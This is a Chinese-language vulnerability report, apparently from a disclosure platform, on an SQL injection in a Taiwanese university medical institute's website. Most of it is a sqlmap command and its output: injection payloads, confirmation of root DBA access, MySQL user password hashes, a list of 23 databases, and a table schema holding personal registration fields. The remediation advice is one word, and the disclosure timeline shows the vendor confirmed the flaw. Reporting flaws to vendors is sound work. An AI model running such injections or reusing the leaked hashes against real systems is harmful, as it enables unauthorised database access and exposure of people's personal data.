2015-10-25: 细节已通知厂商并且等待厂商处理中 2015-10-26: 厂商已经确认,细节仅向厂商公开 2015-11-05: 细节向核心白帽子及相关领域专家公开 2015-11-15: 细节向普通白帽子公开 2015-11-25: 细节向实习白帽子公开 2015-12-10: 细节向公众公开
台湾国立成功大学医学研究所某处存在SQL注入漏洞(DBA权限/root密码泄露/23个库)
测试地址:http://**.**.**.**/english/index.php?content=teacher_person&id=13
python sqlmap.py -u "http://**.**.**.**/english/index.php?content=teacher_person&id=13" -p id --technique=BU --random-agent --batch --current-user --is-dba --users --passwords
---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: content=teacher_person&id=13' AND 6837=6837 AND 'dwcv'='dwcv Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: content=teacher_person&id=13' UNION ALL SELECT NULL,NULL,CONCAT(0x71717a6271,0x594a505444554a6b544d774d4b74764c6a6573426d76484379616d566f746a6847784f7266485154,0x71717a7671),NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)web application technology: Apache 2.2.22, PHP 5.4.33back-end DBMS: MySQL >= 5.0.0current user: 'root@localhost'current user is DBA: Truesqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: content=teacher_person&id=13' AND 6837=6837 AND 'dwcv'='dwcv Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: content=teacher_person&id=13' UNION ALL SELECT NULL,NULL,CONCAT(0x71717a6271,0x594a505444554a6b544d774d4b74764c6a6573426d76484379616d566f746a6847784f7266485154,0x71717a7671),NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)web application technology: Apache 2.2.22, PHP 5.4.33back-end DBMS: MySQL 5database management system users [5]:[*] 'csie_db'@'localhost'[*] 'debian-sys-maint'@'localhost'[*] 'root'@'%'[*] 'root'@'localhost'[*] 'root'@'nckucsie-web'database management system users password hashes:[*] csie_db [1]: password hash: 11b2fa385b550ba2[*] debian-sys-maint [1]: password hash: 78b482ca427c2f77[*] root [2]: password hash: *DD4F7853FD6ECCC38CA99648DF0363D52194D3B4 password hash: 11b2fa385b550ba2sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: content=teacher_person&id=13' AND 6837=6837 AND 'dwcv'='dwcv Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: content=teacher_person&id=13' UNION ALL SELECT NULL,NULL,CONCAT(0x71717a6271,0x594a505444554a6b544d774d4b74764c6a6573426d76484379616d566f746a6847784f7266485154,0x71717a7671),NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)web application technology: Apache 2.2.22, PHP 5.4.33back-end DBMS: MySQL 5available databases [23]:[*] admission[*] approbate[*] class_system[*] classmate[*] csie[*] dept[*] deptvalid[*] health[*] ics2010[*] imi[*] information_schema[*] instvalid[*] lib[*] lib_system[*] master[*] msic[*] mysql[*] ncku_csie[*] performance_schema[*] phd[*] schoolmate[*] score[*] testsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: content=teacher_person&id=13' AND 6837=6837 AND 'dwcv'='dwcv Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: content=teacher_person&id=13' UNION ALL SELECT NULL,NULL,CONCAT(0x71717a6271,0x594a505444554a6b544d774d4b74764c6a6573426d76484379616d566f746a6847784f7266485154,0x71717a7671),NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)web application technology: Apache 2.2.22, PHP 5.4.33back-end DBMS: MySQL 5Database: admission[2 tables]+----------+| proposal || register |+----------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: content=teacher_person&id=13' AND 6837=6837 AND 'dwcv'='dwcv Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: content=teacher_person&id=13' UNION ALL SELECT NULL,NULL,CONCAT(0x71717a6271,0x594a505444554a6b544d774d4b74764c6a6573426d76484379616d566f746a6847784f7266485154,0x71717a7671),NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)web application technology: Apache 2.2.22, PHP 5.4.33back-end DBMS: MySQL 5Database: admissionTable: register[21 columns]+--------+-------------+| Column | Type |+--------+-------------+| time | datetime || birth | varchar(16) || car1 | tinyint(1) || car2 | tinyint(1) || car3 | tinyint(1) || cell | varchar(16) || email | varchar(64) || food | varchar(16) || food1 | tinyint(1) || food2 | tinyint(1) || food3 | tinyint(1) || id | varchar(16) || name | varchar(32) || office | varchar(64) || other1 | tinyint(1) || other2 | tinyint(1) || other3 | tinyint(1) || plate | varchar(16) || school | varchar(64) || tel | varchar(32) || title | varchar(64) |+--------+-------------+
过滤。
危害等级:高
漏洞Rank:18
确认时间:2015-10-26 23:50
感謝通報
暂无
